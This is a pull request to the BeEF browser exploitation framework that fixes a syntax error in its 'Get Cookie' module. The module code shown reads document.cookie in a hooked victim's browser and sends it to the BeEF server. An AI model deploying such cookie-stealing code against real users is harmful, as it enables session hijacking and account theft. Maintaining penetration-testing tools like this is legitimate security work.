### PR TITLE
Update command.js

### DIFF
--- a/modules/browser/hooked_domain/get_cookie/command.js
+++ b/modules/browser/hooked_domain/get_cookie/command.js
@@ -3,7 +3,7 @@
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
-
+beef.execute(function() {
 try {
       beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie, beef.are.status_success());
       beef.debug("[Get Cookie] Cookie captured: "+document.cookie);
@@ -11,5 +11,5 @@ try {
       beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie, beef.are.status_error());
       beef.debug("[Get Cookie] Error");
 }
-
+});
 

--- a/modules/browser/hooked_domain/get_cookie/command.js
+++ b/modules/browser/hooked_domain/get_cookie/command.js
@@ -11,5 +11,5 @@ try {
       beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie, beef.are.status_error());
       beef.debug("[Get Cookie] Error");
 }
-});
+
 


### PR DESCRIPTION
Remove the trailing });. The Get Cookie-module stopped working for me, but works again after I remove the last line which seems lika a bug to me.
I get an error "Unexpected token }" in the Chrome JavaScript-console of the hooked browser when I invoke the module from the BeeF- UI.